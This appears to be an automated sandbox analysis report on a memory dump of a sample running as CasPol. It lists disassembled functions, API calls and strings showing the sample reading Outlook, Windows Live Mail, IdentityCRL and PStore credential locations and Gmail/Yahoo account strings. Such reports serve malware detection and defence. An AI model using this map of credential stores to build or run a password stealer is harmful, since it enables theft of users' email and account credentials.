                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                    • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                                    Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 261 444c4a-444c66 call 444e38 GetModuleHandleA 264 444c87-444c8a 261->264 265 444c68-444c73 261->265 267 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 264->267 265->264 266 444c75-444c7e 265->266 269 444c80-444c85 266->269 270 444c9f-444ca3 266->270 275 444d02-444d0d __setusermatherr 267->275 276 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 267->276 269->264 273 444c8c-444c93 269->273 270->264 271 444ca5-444ca7 270->271 274 444cad-444cb0 271->274 273->264 277 444c95-444c9d 273->277 274->267 275->276 280 444da4-444da7 276->280 281 444d6a-444d72 276->281 277->274 282 444d81-444d85 280->282 283 444da9-444dad 280->283 284 444d74-444d76 281->284 285 444d78-444d7b 281->285 287 444d87-444d89 282->287 288 444d8b-444d9c GetStartupInfoA 282->288 283->280 284->281 284->285 285->282 286 444d7d-444d7e 285->286 286->282 287->286 287->288 289 444d9e-444da2 288->289 290 444daf-444db1 288->290 291 444db2-444dc6 GetModuleHandleA call 40cf44 289->291 290->291 294 444dcf-444e0f _cexit call 444e71 291->294 295 444dc8-444dc9 exit 291->295 295->294
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                    • String ID: 2t
                                                                                                                                                                                    • API String ID: 3662548030-3527913779
                                                                                                                                                                                    • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                                                                                                    Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 299 40fb00-40fb35 call 44b090 RegOpenKeyExA 302 40fc37-40fc3d 299->302 303 40fb3b-40fb4f RegOpenKeyExA 299->303 304 40fb55-40fb7e RegQueryValueExA 303->304 305 40fc2d-40fc31 RegCloseKey 303->305 306 40fc23-40fc27 RegCloseKey 304->306 307 40fb84-40fb93 call 404734 304->307 305->302 306->305 307->306 310 40fb99-40fbd1 call 4047a5 307->310 310->306 313 40fbd3-40fbdb 310->313 314 40fc19-40fc1d LocalFree 313->314 315 40fbdd-40fc14 memcpy * 2 call 40f802 313->315 314->306 315->314
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                    • API String ID: 2768085393-2409096184
                                                                                                                                                                                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                    Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 317 402c5d-402c81 call 410a9c 320 402da5-402db0 317->320 321 402c87-402cb7 memset call 410b62 317->321 324 402d9c-402d9f RegCloseKey 321->324 325 402cbd-402cbf 321->325 324->320 326 402cc4-402d2d call 410b1e memset sprintf call 410a9c 325->326 331 402d3a-402d6b sprintf call 410a9c 326->331 332 402d2f-402d35 call 402bd1 326->332 336 402d7a-402d8a call 410b62 331->336 337 402d6d-402d75 call 402bd1 331->337 332->331 340 402d8f-402d94 336->340 337->336 340->326 341 402d9a-402d9b 340->341 341->324
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                      • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                      • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                                                                                                    • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                    • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                      • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                    • API String ID: 1502082548-2578778931
                                                                                                                                                                                    • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                    Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 363 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 368 40f5c3-40f5ea RegQueryValueExA 363->368 369 40f6d9-40f6df 363->369 370 40f6d0-40f6d3 RegCloseKey 368->370 371 40f5f0-40f5f4 368->371 370->369 371->370 372 40f5fa-40f604 371->372 373 40f606-40f618 call 40466b call 404734 372->373 374 40f677 372->374 384 40f66a-40f675 call 404785 373->384 385 40f61a-40f63e call 4047a5 373->385 376 40f67a-40f67d 374->376 376->370 377 40f67f-40f6bf call 4012ee RegQueryValueExA 376->377 377->370 383 40f6c1-40f6cf 377->383 383->370 384->376 385->384 390 40f640-40f643 385->390 391 40f661-40f664 LocalFree 390->391 392 40f645-40f65a memcpy 390->392 391->384 392->391
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                                                                                                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                    Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 393 4037ca-40381c memset * 2 call 444551 396 4038e2-4038e5 393->396 397 403822-403882 call 4021b6 call 406f06 * 2 strchr 393->397 404 403884-403895 _mbscpy 397->404 405 403897-4038a2 strlen 397->405 406 4038bf-4038dd _mbscpy call 4023e5 404->406 405->406 407 4038a4-4038bc sprintf 405->407 406->396 407->406
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                                                    • API String ID: 317221925-3288273942
                                                                                                                                                                                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                    Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 409 4036e5-4036f5 410 4037c6-4037c7 409->410 411 4036fb-403709 call 410863 409->411 413 40370e-403710 411->413 414 4037c5 413->414 415 403716-40372a strchr 413->415 414->410 415->414 416 403730-403787 call 4021b6 _mbscpy * 2 strlen 415->416 419 4037a4-4037c0 _mbscpy call 4023e5 416->419 420 403789-4037a1 sprintf 416->420 419->414 420->419
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                      • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                    • API String ID: 3261640601-4097000612
                                                                                                                                                                                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 422 4034e4-403544 memset * 2 call 410b1e 425 403580-403582 422->425 426 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 422->426 426->425
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                    Function 00408DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 431 408db6-408dbd 432 408dc4-408dd0 431->432 433 408dbf call 408d34 431->433 435 408de2 432->435 436 408dd2-408ddb 432->436 433->432 439 408de4-408de6 435->439 437 408e0d-408e1c 436->437 438 408ddd-408de0 436->438 437->439 438->435 438->436 440 408f07 439->440 441 408dec-408df2 439->441 442 408f09-408f0b 440->442 443 408df4-408e04 441->443 444 408e1e-408e25 441->444 447 408e05-408e0b 443->447 445 408e27-408e47 _mbscpy call 409240 444->445 446 408e6b-408e7e call 408f0c 444->446 454 408e49-408e59 strlen 445->454 455 408e5b-408e69 445->455 448 408e7f-408e87 LoadStringA 446->448 447->448 453 408e89 448->453 456 408f00-408f05 453->456 457 408e8b-408e9a 453->457 454->453 454->455 455->447 456->442 457->456 458 408e9c-408ea8 457->458 458->456 459 408eaa-408efe memcpy 458->459 459->440 459->456
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                    • strings, xrefs: 00408E27
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                    • API String ID: 4036804644-4125592482
                                                                                                                                                                                    • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                    • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                                                                    Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 460 410863-41088b UuidFromStringA * 2 461 4108dd 460->461 462 41088d-41088f 460->462 463 4108df-4108e2 461->463 462->461 464 410891-4108aa call 410827 462->464 466 4108af-4108b1 464->466 466->461 467 4108b3-4108b9 466->467 468 4108bb-4108bd 467->468 469 4108be-4108db memcpy CoTaskMemFree 467->469 468->469 469->463
                                                                                                                                                                                    APIs
